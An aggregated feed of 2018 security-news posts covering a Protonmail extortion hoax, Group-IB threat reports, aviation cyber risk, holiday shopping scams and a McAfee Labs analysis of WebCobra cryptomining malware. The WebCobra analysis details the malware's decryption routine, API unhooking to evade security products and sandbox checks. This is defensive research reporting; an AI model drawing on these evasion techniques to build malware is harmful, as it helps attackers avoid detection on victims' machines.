“While Protonmail’s open-source code can be freely audited on Github, they haven’t configured the mandatory SRI feature (https://www.w3.org/TR/SRI/). This leaves users without any guarantee about their source code integrity, thus allowing tampering and data collection at anytime. This will be totally transparent and unnoticed, because without enabling SRI all the users should inspect the website runtime code and its connections manually in the same moment they’re being tampered with by Protonmail to discover it.”

“Incidentally during this period we noticed that Protonmail sends decrypted user data to American servers frequently.  This may be due to the Swiss MLAT treaty requiring swiss companies reveal all their data to the Americans.  However it also might be possible they are sending this decrypted user data to the American firm that owns them.  This was simply a surprising thing to note but did not significantly influence our operation.” added the hacker.

ProtonMail denied having been hacked that added that this is just a hoax.

Below the ProtonMail reply to a Reddit thread:

“This extortion attempt is a hoax and we have seen zero evidence to suggest otherwise.” states the company.

“A closer reading of some of the claims, e.g. “circumventing the Geneva convention, underwater drone activities in the Pacific Ocean, and possible international treaty violations in Antarctica”, etc, should also cause a reasonable observer to draw the same conclusion.”

ProtonMail confirmed to be aware of a limited number of hacked accounts that have been compromised likely through credential stuffing of phishing attacks, but excluded that its systems have been breached.

“As many of you may be aware, earlier today, criminals attempted to extort ProtonMail by alleging a data breach, with zero evidence. An internal investigation turned up two messages from the criminals involved, which again repeated the allegations with zero evidence, and demanded payment. We have no indications of any breach from our internal infrastructure monitoring.” wrote the company.

“Like any good conspiracy theory, it is impossible to disprove a breach. On the other hand, a breach can be easily proven by providing evidence. The lack of evidence strongly suggests there is no breach, and this is a simple case of online extortion.”

protonmail hacked

The hackers are claiming they have data on Michael Avenatti and CNN employees.

The hacker is also offering $20 USD in bitcoin for spreading info about the alleged hack using the #Protonmail hashtag on Twitter.

This is a very strange and anomalous scam attempt, the hackers used a mix of appealing info and political data. Why mention Avenatti in a scam attempt? Is it a message to someone? Why hackers did not publish a sample of stolen data?

Stay Tuned…

Pierluigi Paganini

(Security Affairs – Protonmail, hacking)

The post Protonmail hacked …. a very strange scam attempt appeared first on Security Affairs.

Group-IB presented latest cybercrime and nation-state hacking trends in Asia

According to Group-IB’s report findings, Asia is one of the most actively attacked regions in the world, the company presented latest cybercrime trends.

Hong Kong, 16.11.2018 – Group-IB, an international company that specializes in preventing cyber attacks, presented the findings of its latest Hi-Tech Crime Trends 2018 report at the FinTech Security Conference in Hong Kong organized by Binary Solutions Limited in partnership with Group-IB.

According to Group-IB’s report findings, Asia is one of the most actively attacked regions in the world. Over the past year, 21 state-sponsored groups were detected in the area, which is more than in Europe and the US combined. Hong Kong, Singapore, Seoul, and Shanghai, and many other financial powerhouses in Asia are likely to become primary targets of financially motivated hacker groups in the near future.

“Cyber trends and threats that we identified in the world are likely to occur in Asia. Asia’s rapid economic growth has ramped up the interest of financially motivated hackers and state-sponsored hacker groups. Local banks have already been attacked by advanced hacker groups several times; we expect this trend to increase,” – comments Dmitry Volkov, Group-IB CTO.

The threats that are notable for the Asian region are represented by a significant number of attacks aimed at manufacturing of chips, microprocessors and system control boards of different IT vendors, whose principal manufacturing operations are located in Asia. The attackers’ research vector is now shifting from software vulnerabilities to those located at the hardware and firmware level. To exploit certain hardware vulnerabilities, hackers can simply run a JavaScript code, as in the case of Glitch vulnerability. It is very difficult, if not impossible to eliminate these vulnerabilities with software updates and as such they create new opportunities for cybercriminals. It is likely that in the space of a few years they will seriously affect the cyber security market.”

Since the beginning of 2018, Group-IB experts detected that cybercriminals were seeking to get access to the user databases of Hong Kong state Internet portals responsible for taxes, trade, procurement, logistics, innovations and hi-tech infrastructure.

Espionage as one of the main APT groups’ goals

The threat landscape for critical infrastructures is growing more complex, provoked by the activity of state-sponsored threat actors, who are seeking to establish a sustained presence within critical infrastructure networks for long-term espionage or sabotage. These groups target companies in energy, financial, aviation, water sectors etc. Banks are considered to be an integral part of critical infrastructure. Which is why the availability of tools and experience in disrupting bank systems are now priorities for attackers. Such tools are actively used by two groups in particular: BlackEnergy and Lazarus.

To infiltrate critical infrastructure networks hackers will continue to use phishing as one of their main tools, but the focus of attacks might shift to vulnerable network equipment connecting the network to the Internet. APT groups will keep investing heavily in the development and acquisition of zero-day exploits, according to Group-IB’s forecasts.  Another trend Group-IB experts identified is networks compromise through key personnel’s home networks and personal devices. Increasingly often, state-sponsored hackers are focusing on vulnerabilities in home routers. This allows them to not only spy on users without infecting their devices, but also maintain a more extensive and dynamic infrastructure and remain unnoticed.

Group-IB’s new report features the activity of roughly 40 state-sponsored groups around the world, 21 one of which were most active in Asia-Pacific, including the Infamous North-Korean Lazarus group. For some of the hacker groups detected, the country of origin is yet to be established. The attribution is sometimes complicated by the fact that some groups may imitate other groups’ unique features to throw researchers off track.

Attacks on Crypto

In 2017-2018 hackers’ interest in cryptocurrency exchanges ramped up. Thirteen exchanges were hacked in 2017 and in the first three quarters of 2018, amounting to a total loss of $877 million. Thus, 60% of the total amount was stolen from Coincheck, a Japanese cryptocurrency exchange. Silence, MoneyTaker and Cobalt are likely to conduct new attacks on crypto exchanges.

A relatively new method of fraud on the ICO market was stealing a White Paper of ICO project and presenting an identical idea under a new brand name. Spear phishing remains the major vector of attack: approximately 56% of all money siphoned off from ICO were stolen using phishing.

In 2018 Group-IB detected five successful “51% attacks”, when attackers take control over at least 51% of mining power. Having 51% of computing power, the attackers create a stealthy alternative blockchain to confirm their own transactions. In 2018 the direct financial losses from these attacks amounted to almost $20 million.

Attacks on banks and their clients                   

Advanced hacker groups that Group-IB identifies as most dangerous to banking sector all over the world are Lazarus, MoneyTaker, Cobalt and Silence. The three latter are led by Russian-speaking hackers. All these groups are able to not only penetrate a bank’s network and access isolated financial systems, but also withdraw money via SWIFT, card processing systems, and ATMs. The Lazarus group will continue to attack banks and steal funds via SWIFT. They will likely experiment with attacks on card processing, primarily focusing on Asia and the Pacific. New cybercrime groups are also expected to start operations in Asia and Latin America.

The number of attacks via SWIFT increased dramatically over the reviewed period. In the previous period, three such attacks were tracked – in Hong Kong, Ukraine, and Turkey. In this period, however, 9 successful attacks have already taken place in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. Only two hacker groups target the SWIFT interbank transfer system: Lazarus and Cobalt. The average volume of theft attempt via SWIFT is estimated at $26 million.

Group-IB marked six new PC Trojans that appeared internationally: IcedID, BackSwap, DanaBot, MnuBot, Osiris и Xbot. Web phishing, which is another popular attack vector, has grown globally. The financial phishing is, predictably, mainly targeting US-based companies. The corresponding share of financial phishing webpages is 26%. France and Germany are second and third, respectively, in this ranking. Among all phishing resources, 73% can be divided into the following categories: cloud storages (28%), financial platforms (26%), and online services (19%).

During the last year, Group-IB Threat Intelligence detected 27 million cards uploaded to card shops. The company’s records indicate that dumps account for 62% of data sold, which means that POS Trojans are the main method of compromising plastic cards. Unlike dumps, text data is sold much cheaper in card shops: its total value amounted to $95.6 million, accounting for only 17% of the overall market value, compared to 19.9 million dumps, which cost as much as $567.8 million.

Group-IB in Asia

Group-IB is not a stranger to the region. It has recently announced the opening of the Global HQ in Singapore by the end of 2018, where Group-IB will manage and keep developing its global threat-hunting infrastructure aimed at adversary-centric detection and proactive threat hunting. Group-IB’s portfolio of clients in Asia includes banks, financial and government organizations in Singapore, Thailand and other countries. Southeast Asia accounts for more than 30% of the company’s international revenue.

About the author Group-IB

Group-IB is one the world’s leading providers of solutions aimed at detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. GIB Threat Intelligence cyber threats data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55 000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – Central Bank of Russia, cybercrime)

The post Group-IB presented latest cybercrime and nation-state hacking trends in Asia appeared first on Security Affairs.

Two hacker groups attacked Russian banks posing as the Central Bank of Russia

Group-IB has detected massive campaigns targeting Russian financial institutions posing as the Central Bank of Russia.

The emails were disguised to look as if they come from the Central Bank of Russia and FinCERT, the Financial Sector Computer Emergency Response Team. Group-IB experts have discovered that the attack on 15 November could have been carried out by the hacker group Silence, and the one on 23 October by MoneyTaker. Group-IB considers both cybercriminal groups among the most dangerous to Russian and international financial organisations.                                                                                  

November attack: Silence

In the morning of 15 November, Group-IB detected a malicious mass email campaign sent to Russian banks from a fake email address purporting to belong to the Central Bank of Russia (CBR). Of course, the CBR does not have anything to do with the phishing campaign – the hackers faked the sender’s address. SSL certificates were not used for DKIM verification. Emails with the subject line “Information from the Central Bank of the Russian Federation” asked recipients to review the regulator’s decision “On the standardisation of the format of CBR’s electronic communications” and to immediately implement the changes. The documents in question were supposedly contained in the zipped files attached, however by uncompressing these files users downloaded Silence.Downloader – the tool used by Silence hackers.

Group-IB experts have observed that the style and format of the emails were almost identical to official correspondence from the regulator. The hackers most likely had access to samples of legitimate emails. According to Group-IB’s report published in September 2018, Silence gang members presumably were or are legally employed as pentesters and reverse engineers. As such, they are very familiar with documentation in the financial sector and the structure of banking systems.

October attack: MoneyTaker 

The message sent on 23 October, also from a fake FinCERT email address, contained five attachments disguised to look like official CBR documents. Among them was a document entitled “Template Agreement on Cooperation with the Central Bank of the Russian Federation on Monitoring and Information Exchange .doc”. Three out of five files were empty decoy documents, but two contained a download for the Meterpreter Stager. To carry out the attack, hackers used self-signed SSL certificates. Furthermore, the server infrastructure involved had been used in the previous attacks conducted by MoneyTaker. All these factors led to the conclusion that MoneyTaker was behind the October attack.

Group-IB experts believe that hackers managed to obtain the samples of CBR documents from earlier compromised mailboxes belonging to employees of Russian banks. MoneyTaker used the information obtained to design emails and documents purporting to be from the CBR to conduct targeted attacks on banks.

A spear-phishing campaign set up to look like it was carried out by the Central Bank is a relatively widespread vector of attack among cyber criminals; it has been used by groups such as Buhtrap, Anunak, Cobalt, and Lurk. In March 2016, for example, cybercriminals sent phishing emails from info@fincert.net. As regards to genuine notifications from the Central Bank of Russia, in the past hackers from Lurk and Buhtrap used them to send malware to bank employees.

“Since July, to share information, FinCERT has been using an automated incident processing system that makes it possible to securely and quickly share information about incidents and unauthorized  operations based on the “Feed-Antifraud” database,” comments the Central Bank’s press service. “The backup channel for sharing information is email. All messages sent via email contain FinCERT’s electronic signature.”

Information and indicators of attack (IoAs) from 23 October and 15 November attacks were quickly uploaded to Group-IB Threat Intelligence, which allowed to warn Group-IB clients among Russian banks about the potential threat. Group-IB TDS (Threat Detection System) detected both phishing campaigns and signaled about the malicious activity. Group-IB system blocked this threat in inline mode. 

“MoneyTaker and Silence are two of the four most dangerous hacker groups that present a real threat to international financial organisations,” said Rustam Mirkasymov, Group-IB Head of Dynamic Analysis of malware department and threat intelligence expert. “Hackers from MoneyTaker use all possible attack vectors when targeting banks. For example, they can send spear-phishing emails, carry out a drive-by attack, or test a bank’s network infrastructure for existing vulnerabilities. After gaining access to the network’s internal nodes, hackers are easily able to carry out attacks and withdraw money through ATMs, card processing or interbank transfers systems (in Russia, AWS CBR (the Russian Central Bank’s Automated Workstation Client). Silence, for their part, are less resourceful and use only a tried and tested attack method – phishing emails. Unlike their colleagues, however, they pay closer attention to the content and design of their phishing emails.”

About Silence

Silence is an active though very small group of Russian-speaking hackers. Group-IB first detected the group’s activity in 2016. Over the course of their ‘work’, Silence attacked bank management systems, card processing systems, and the Russian interbank transfers system (AWS CBR). The gang’s targets are mainly located in Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan, although phishing emails were sent to bank employees in Central and Western Europe, Africa, and Asia. A month ago, Group-IB detected a spear-phishing attack targeting the companies in the United Kingdom. The report “Silence: Moving into the darkside” was published in September 2018 and was the first to describe the group’s tactics and tools.

About MoneyTaker

MoneyTaker is a hacker group that is thought to be responsible for 16 attacks in the United States, 5 attacks on Russian banks, and 1 in the United Kingdom. Apart from money, the criminals steal documentation about interbank payment systems that is necessary for preparing future attacks. The group also carries out attacks through intermediaries by hacking banks’ partners, IT companies, and financial product providers. In December 2017, Group-IB published its first report on the group:“MoneyTaker: 1.5 years of silent operations”.

About the author Group-IB

Group-IB is one the world’s leading providers of solutions aimed at detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. GIB Threat Intelligence cyber threats data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55 000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – Central Bank of Russia, cybercrime)

The post Two hacker groups attacked Russian banks posing as the Central Bank of Russia appeared first on Security Affairs.

Online shoppers continue to engage in risky behavior

Findings from a new McAfee survey reveal the risky habits of online shoppers, including using unsecured Wi-Fi for online shopping and purchasing items from online retailers they are not fully confident are genuine (51 percent). This highlights the need for consumers to slow down and consider the risks of unsafe purchasing behavior that could lead to identity theft or financial loss. Last year consumers spent $453.46 billion on the web for retail purchases, which was … More

The post Online shoppers continue to engage in risky behavior appeared first on Help Net Security.

Compromising vital infrastructure: air traffic control

While most of us know that flying is the safest mode of transport, we still feel that sigh of relief when the plane has made its landing on the runway and we can text our loved ones that we have arrived safe and sound. Accidents may be rare, but they’re often shocking and horrific and accompanied by the loss of many lives. Unfortunately, they also tend to make the news, which only heightens fear.

In this blog post, we look at the dangers related to flying from a cybersecurity perspective. As we know, cybercriminals are motivated mostly by money, power, and ego—and messing with air traffic and air traffic control can boost any of those factors. While the majority of these cybersecurity incidents result in data breaches, make no mistake: Attacks on this vital infrastructure could lead to much more grim consequences.

Air traffic control

Air traffic can roughly be divided into four general categories:

  • Public transport
  • Cargo and express freight
  • Military operations
  • Smaller aircrafts (recreational, training, helicopters, and drones)

Organizations like the ATO and EUROCONTROL manage the air traffic across entire continents, communicating with commercial and military bodies to control the coordination and planning of air traffic in their designated territory. These organizations work closely together, as there are many intercontinental flights that pass from one territory to another.

Air traffic control organizations need to react quickly to incidents, and their instructions should be followed to the T. They need flawless communication to work properly, as they are crucial to maintaining the normal flow of air traffic. Therefore, these organizations and their related systems are heavily computerized. This makes them primary targets for cyberattacks.

Public transportation

Using airlines as a means of public transport brings with it certain security-related dangers. Online bookings have led to many data leaks. Recently we have learned about breaches at Cathay Pacific, British Airways, Arik Air, and Air Canada. Some of these breaches were website hacks. Others only concerned users of mobile apps.

Another privacy-related cause for worry is the type of information displayed on an airline ticket or boarding pass. Some people post pictures of their tickets on social media, and the Aztec codes used on those tickets are easy to decipher. This can provide a threat actor with a wealth of personally identifiable information, such as payment method, confirmation numbers, names, and addresses.

Travelers should also pay extra attention to spam that comes in looking convincingly like a ticket confirmation. This type of spam has been around for a few years, and is usually easy to discard—except when you actually happened to have booked with the same airline being spoofed.


For more travel safety tips read: Tips for safe summer travels: your cybersecurity checklist


Air cargo

Air cargo is by definition always in a hurry. If delivery of the cargo wasn’t urgent, it would have been put on a less costly mode of transportation. This makes shipment information valuable to both thieves and scammers. How often have you received a phishing mail claiming to be shipment information from one of the major express freighters such as DHL, FedEx, or UPS? If a threat actor were to know you were expecting air cargo or an express delivery from a particular company, these blind attempts could become more targeted and efficient.

Military

In warfare, competition for air supremacy is fierce. It is defined by the USDoD and NATO as the “degree of air superiority wherein the opposing air force is incapable of effective interference.” There are several levels of control of the air, but the general idea is that air supremacy is a major goal on the way to victory.

In modern warfare, you can expect every side to try every possible way to gain control of the air, including cyberattacks on the enemies’ air traffic infrastructure. In such a scenario, the infrastructure includes planes, aircraft factories, airports, air traffic control, and the lines of communications between all of them.

Recreational use of the airways

Interfering with recreational air traffic may not be a target for cybercriminals, but recreational traffic can, and has been known to, hinder other forms of air traffic. Drones have been reported in hundreds of near misses with commercial air liners, and one even managed to land on the grounds of the White House. Considering that the number of drones is expected to grow exponentially in years to come—with increasing commercial use-cases, such as delivery, photography, inspection, and reconnaissance—expect more interference problems to emerge.

Drones come in many forms and shapes, and the same is true for their level of security. But you can readily assume that most of them can be remotely hacked. In the US, drone operations are not allowed within five miles of an airport unless they inform traffic control. One would expect these rules to become stricter as we proceed.

Terrorist attacks

Aircrafts have been hijacked by terrorists in the past, the most famous example being 9/11, where terrorists snuck their way onto four different aircrafts, incapacitated the pilots, and flew the planes into the World Trade Centers, Pentagon, and crashing into a field in Pennsylvania. These physical, in-person hijacks are the reason for the extensive security measures that you encounter at every major airport.

But hijackers don’t have to be physically present to cause huge damage. As demonstrated in the past, aircrafts can be hacked remotely and malware can infect computer systems in the aircraft.

Ransomware victims

Like any other industry, you will find many ransomware victims in the aviation and air traffic sector.

The flight information screens on Bristol Airport went dark after the airport’s administration system was the subject of a cyberattack. The attack was suspected to be ransomware, although I could not find official confirmation for this. In this case, flight operations were (thankfully) not affected.

Boeing was one of the many victims of the WannaCry attack in May 2017, even though the attack was played down afterward, since the production lines had not been disturbed.

As mentioned in an earlier blog, air and express freight carrier FedEx has been a ransomware victim twice: once through their TNT division hit by NotPetya, and once in their own delivery unit by WannaCry.

Targeted cyberattacks

A targeted attack was suspected when malware was found in the IT network of Boryspil International Airport, located in the Ukraine, which reportedly included the airport’s air traffic control system. Due to rocky relations between Ukraine and Russia, attribution quickly swerved to BlackEnergy, a Russian APT group held responsible for many cyberattacks on the Ukraine.

Ukranian aircraft builder Antonov was also a victim of NotPetya, ransomware that was suspected of targeting Ukrainian users. In hindsight, it may just have looked that way because the malware was spread with software update systems for a Ukrainian tax accounting package called MeDoc.

Budget concerns

In 2017, the Air Traffic Control Association (ATCA) published a white paper issuing the following warning:

Where budgets are concerned, cybersecurity is treated reactively instead of proactively.

This was after a 2016 report by the Ponemon Institute that found organizations did not budget for the technical, administrative, testing, and review activities that are necessary to operate a truly secure system. Instead, at least two-thirds of businesses waited until they had experienced a cyberattack or data breach to hire and retain security vendors to help.

The budgeting process for systems architecture in the aviation industry does not account for built-in security. It would certainly make sense to include it if we want to protect our passengers and cargo making use of this vital infrastructure. It would even be more cost effective, since retroactively securing a system after an attack is usually much more expensive than preventing one.

So, while the physical security on airports has been tightened significantly, it would seem the cybersecurity of this important infrastructure still needs a lot of work, especially when you consider the sheer number of cyberattacks on the industry that have taken place in the last few years.

Those in the aviation, air traffic, and air cargo industries need to include cybersecurity in their budget and design proposals for 2019, otherwise the excrement might really hit the propeller.

The post Compromising vital infrastructure: air traffic control appeared first on Malwarebytes Labs.

Report: Small, Stealthy Groups Behind Worst Cybercrimes

A small group of cybercriminals are responsible for the most damaging cyberattacks--often with the help of state sponsorship. Still, low-level criminal activity on the dark web still poses the most widespread and immediate security threat, with cryptocurrency mining, ransomware and malware all on the rise, a recent report has found.

The post ...

Read the whole entry... »

Related Stories

Online shopping fraud to surge during Black Friday and Cyber Monday

New benchmark data from ACI Worldwide revealed a projected 14 percent increase in fraud attempts during the upcoming 2018 peak holiday season. Based on hundreds of millions of merchant transactions, the data shows that fraud attempts are going to be at their highest across the Black Friday and Cyber Monday weekend. Principal findings from the data include: Fraud attempts expected to increase 14% during 2018 peak holiday season Cross Channel fraud continues to grow: In … More

The post Online shopping fraud to surge during Black Friday and Cyber Monday appeared first on Help Net Security.

Holiday Stress Can Make You More Careless Online

Holiday stress. Every year, come November, my resting heart rate starts to rise: the festive season is approaching. Not only is there so much to do but there’s so much to spend money on. There are presents to purchase, feasts to prepare and party outfits to buy. Throw in a holiday to fill the long Summer break, and both the credit cards and my stress levels are starting to rapidly increase!

Holiday Financial Stress Results in Poor Decision Making Online

But did you know that this stress can affect our online safety? Research conducted by McAfee shows that almost 80% of us believe the holiday period causes financial stress. And nearly half of us (46%) believe the stress of the holiday season can cause us to behave carelessly online.  Risky behaviours can put our online safety at risk. For instance, using public Wi-Fi to snag a last-minute purchase. Or buying something from an unfamiliar website because it’s cheaper.

Aussie Shoppers Love an Online Bargain 

In 2017, Aussies spent a record $21.3 million online – a whopping 19% increase over 2016. McAfee’s research shows that Aussie consumers love securing a bargain online – who doesn’t!! But many will seek out a great deal even if it means potentially jeopardising their online safety. The research shows that 64% of consumers are willing to use an unfamiliar website if it means they can save money on their purchase. Even more concerning, a third of Aussies admitted to clicking links in suspicious emails for better deals!! Yikes!!

The Thing Is, Cyber Criminals Love Your Holiday Shopping Too

Cyber criminals work very hard to take advantage of us during the busy Holiday season. They come up with all sorts of ingenious ways to target time-poor and budget-conscious consumers online. They know very well that many of us will cut corners with our online security. Particularly if we think we can save money on presents, outfits or even a holiday.

And they scheme accordingly: charity phishing emails, fake online stores, bogus delivery emails, e-voucher scams and more. Cyber criminals have tried and tested strategies to either steal our personal information or our identity.

How You Can Stay Safe While Shopping Online This Holiday Season

So, don’t feel like you need to battle the crowds at Westfield this festive season. You can still shop online safely if you follow a few simple steps:

  1. Connect with Caution

Public Wi-Fi is just so convenient, but it is a risky business. Users could unknowingly share their personal information with cyber criminals who are snooping on the network. So, if you absolutely have to use public Wi-Fi for a great online shopping deal, always use a Virtual Private Network (VPN) such as McAfee Safe Connect which creates a bank-grade encrypted connection.

  1. Think Before You Click

One of the easiest ways for a cyber criminal to target victims is using phishing emails to trick consumers into sharing their personal information. Phishing emails could be disguised as holiday savings or even a shopping notification. Instead of clicking on a link in an email, always check directly with the source to verify an offer or shipment.

  1. Always Shop with Security Protection

Shopping online without security protection is like driving without a seat belt – dangerous! Comprehensive antivirus software like McAfee Total Protection will help shield your devices against malware, phishing attacks and other threats. It also provides a firewall, an anti-spam function, parental controls and a password management tool. A complete no-brainer!

But this year, I’m going to commit to lowering my stress. That way I can really enjoy my time with my family and friends. To get ahead of the game I plan to:

  • Start my online shopping earlier so I don’t ‘cut corners’ with my online safety,
  • Create a realistic budget, and
  • Start filling my freezer with some holiday food – now

And most importantly, get that resting heart rate under control!!

Happy Holidays Everyone!

Alex xx

The post Holiday Stress Can Make You More Careless Online appeared first on McAfee Blogs.

Preventing WebCobra Malware From Slithering Onto Your System

Cryptocurrency mining is the way transactions are verified and added to the public ledger, a database of all the transactions made around a particular piece of cryptocurrency. Cryptocurrency miners compile all of these transactions into blocks and try to solve complicated mathematical problems to compete with other miners for bitcoins. To do this, miners need a ton of computer resources, since successful bitcoin mining requires a large amount of hardware. Unfortunately, these miners can be used for more nefarious purposes if they’re included within malicious software. Enter WebCobra, a malware that exploits victims’ computers to help cybercriminals mine for cryptocurrencies, a method also known as cryptojacking.

How does WebCobra malware work, exactly? First, WebCobra uses droppers (Trojans designed to install malware onto a victim’s device) to check the computer’s system. The droppers let the malware know which cryptocurrency miner to launch. Then, it silently slithers onto a victim’s device via rogue PUP (potentially unwanted program) and installs one of two miners: Cryptonight or Claymore’s Zcash. Depending on the miner, it will drain the victim’s device of its computer processor’s resources or install malicious file folders that are difficult to find.

The most threatening part of WebCobra malware is that it can be very difficult to detect. Often times, the only sign of its presence is decreased computer performance. Plus, when the dropper is scanning the victim’s device, it will also check for security products running on the system. Many security products use APIs, or application programming interfaces, to monitor malware behavior – and WebCobra is able to overwrite some. This means it can essentially unhook the API and disrupt the system’s communication methods, and therefore remain undetected for a long time.

While cryptocurrency mining can be a harmless hobby, users should be cautious of criminal miners with poor intentions. So, what can you do to prevent WebCobra from slithering onto your system? Check out the following tips:

  • If your computer slows down, be cautious. It can be hard to determine if your device is being used for a cryptojacking campaign. One way you can identify the attack – poor performance. If your device is slow or acting strange, start investigating and see if your device may be infected with malware.
  • Use a comprehensive security solution. Having your device infected with malware will not only slow down its performance but could potentially lead to exposed data. To secure your device and help keep your system running smoothly and safely, use a program like McAfee Total Protection. McAfee products are confirmed to detect WebCobra.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing WebCobra Malware From Slithering Onto Your System appeared first on McAfee Blogs.

Secret Sister scam returns in time for Christmas

The festive season may be imminent, but it’s a Facebook Secret Sister (not Santa) you have to steer clear of. Secret Sister has been a mainstay of Yuletide scams since at least 2015, and has come back around once more. But what is it?

Your office probably has a Secret Santa scheme in place. You draw names from a hat, and you secretly buy the named person a gift. It’s all pretty straightforward, and a great source of unwanted deodorants and novelty kitchenware. Secret Sister isn’t quite as nice, and could drop you in a great deal of trouble. You probably won’t even get your hands on the deodorant.

How the scam works

Usually, chain letters of the Secret Sister variety are jammed through your front door. In this case, the chain letter lands in your digital mailbox as opposed your real one. You could in theory receive one of these anywhere, and people have reported receiving them on everywhere from Reddit and Facebook to various social portals and forums. For whatever reason, Facebook seems to be the scammer’s favourite place to get the ball rolling on this particular scam. The possibility of being able to send it pinging around large social connection chains is too good to resist.

Secret Sister sample 

The messages can vary wildly, but one of the most popular ones going back a year or so reads as follows:

Anyone interested in a Holiday Gift exchange? I don’t care where you live – you are welcome to join. I need 6 (or more) ladies of any age to participate in a secret sister gift exchange. You only have to buy ONE gift valued at $10 or more and send it to one secret sister and you will receive 6-36 in return!

Let me know if you are interested and I will send you the information!

Please don’t ask to participate if you are not willing to spend the $10.

TIS THE SEASON! and its getting closer. COMMENT if You’re IN and I will send you a private message. Please don’t comment if you are not interested and aren’t willing to send the gift!

It might sound promising to many people reading it, but it really won’t do you much good.

From chains to pyramids

Chain letters are essentially pyramid schemes. Pyramid schemes involve funneling money from bottom to top of the pyramid, benefiting those at the top and not many others. If you’re there from the get-go, your chances of making a good return increase somewhat. For everyone else, you’re probably going to lose out.

Where this becomes complicated is in the US is these schemes tend to resemble gambling. This means you could easily end up breaking the law. From the US Postal Inspectors website:

They’re illegal if they request money or other items of value and promise a substantial return to the participants. Chain letters are a form of gambling, and sending them through the mail (or delivering them in person or by computer, but mailing money to participate) violates Title 18, United States Code, Section 1302, the Postal Lottery Statute

Secret Sister data harvesting

You definitely won’t receive a pile of free gifts. However, you could be dragged into some sort of dubious postal scam with mail fraud penalties instead. There’s also the risk of identity theft to consider. Mail fraud scammers typically ask for various pieces of personal information. You could end up handing them your name, address, phone number, alongside a variety of online profiles to tie them to. This could be all an enterprising criminal needs to do some additional damage, especially if they persist in branching out from your profile to those of your friends.

No matter how appealing the prospect of easy free gifts sounds as 2018 slowly draws to a close, don’t fall for it. These types of antics have been around for a long time, and moving into the digital realm doesn’t make them any safer. If you’re not based in the US, you may not have the legal worry to deal with as a result but that’s scant consolation.

Our advice is to stick to Secret Santa, and give his sister nothing more than a Return to Sender.

The post Secret Sister scam returns in time for Christmas appeared first on Malwarebytes Labs.

WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency

The authors thank their colleagues Oliver Devane and Deepak Setty for their help with this analysis.

McAfee Labs researchers have discovered new Russian malware, dubbed WebCobra, which harnesses victims’ computing power to mine for cryptocurrencies.

Coin mining malware is difficult to detect. Once a machine is compromised, a malicious app runs silently in the background with just one sign: performance degradation. As the malware increases power consumption, the machine slows down, leaving the owner with a headache and an unwelcome bill, as the energy it takes to mine a single bitcoin can cost from $531 to $26,170, according to a recent report.

The increase in the value of cryptocurrencies has inspired cybercriminals to employ malware that steals machine resources to mine crypto coins without the victims’ consent.

The following chart shows how the prevalence of miner malware follows changes in the price of Monero cryptocurrency.

Figure 1: The price of cryptocurrency Monero peaked at the beginning of 2018. The total samples of coin miner malware continue to grow. Source: https://coinmarketcap.com/currencies/monero/.

McAfee Labs has previously analyzed the cryptocurrency file infector CoinMiner; and the Cyber Threat Alliance, with major assistance from McAfee, has published a report, “The Illicit Cryptocurrency Mining Threat.” Recently we examined the Russian application WebCobra, which silently drops and installs the Cryptonight miner or Claymore’s Zcash miner, depending on the architecture WebCobra finds. McAfee products detect and protect against this threat.

We believe this threat arrives via rogue PUP installers. We have observed it across the globe, with the highest number of infections in Brazil, South Africa, and the United States.

Figure 2: McAfee Labs heat map of WebCobra infections from September 9–13.

This cryptocurrency mining malware is uncommon in that it drops a different miner depending on the configuration of the machine it infects. We will discuss that detail later in this post.

Behavior

The main dropper is a Microsoft installer that checks the running environment. On x86 systems, it injects Cryptonight miner code into a running process and launches a process monitor. On x64 systems, it checks the GPU configuration and downloads and executes Claymore’s Zcash miner from a remote server.

Figure 3: WebCobra’s installation window.

After launching, the malware drops and unzips a password-protected Cabinet archive file with this command:

Figure 4: The command to unzip the dropped file.

The CAB file contains two files:

  • LOC: A DLL file to decrypt data.bin
  • bin: Contains the encrypted malicious payload

The CAB file uses the following script to execute ERDNT.LOC:

Figure 5: The script to load the DLL file, ERDNT.LOC.

ERDNT.LOC decrypt data.bin and passes the execution flow to it with this routine:

  • [PlainText_Byte] = (([EncryptedData_Byte] + 0x2E) ^ 0x2E) + 0x2E

Figure 6: The decryption routine. 

The program checks the running environment to launch the proper miner, shown in the following diagram:

Figure 7: Launching the proper miner depending on a system’s configuration.

Once data.bin is decrypted and executed, it tries a few anti-debugging, anti-emulation, and anti-sandbox techniques as well as checks of other security products running on the system. These steps allow the malware to remain undetected for a long time.

Most security products hook some APIs to monitor the behavior of malware. To avoid being found by this technique, WebCobra loads ntdll.dll and user32.dll as data files in memory and overwrites the first 8 bytes of those functions, which unhooks the APIs.

List of unhooked ntdll.dll APIs

  • LdrLoadDll
  • ZwWriteVirtualMemory
  • ZwResumeThread
  • ZwQueryInformationProcess
  • ZwOpenSemaphore
  • ZwOpenMutant
  • ZwOpenEvent
  • ZwMapViewOfSection
  • ZwCreateUserProcess
  • ZwCreateSemaphore
  • ZwCreateMutant
  • ZwCreateEvent
  • RtlQueryEnvironmentVariable
  • RtlDecompressBuffer

List of unhooked user32.dll APIs

  • SetWindowsHookExW
  • SetWindowsHookExA

Infecting an x86 system

The malware injects malicious code to svchost.exe and uses an infinite loop to check all open windows and to compare each window’s title bar text with these strings. This is another check by WebCobra to determine if it is running in an isolated environment designed for malware analysis.

  • adw
  • emsi
  • avz
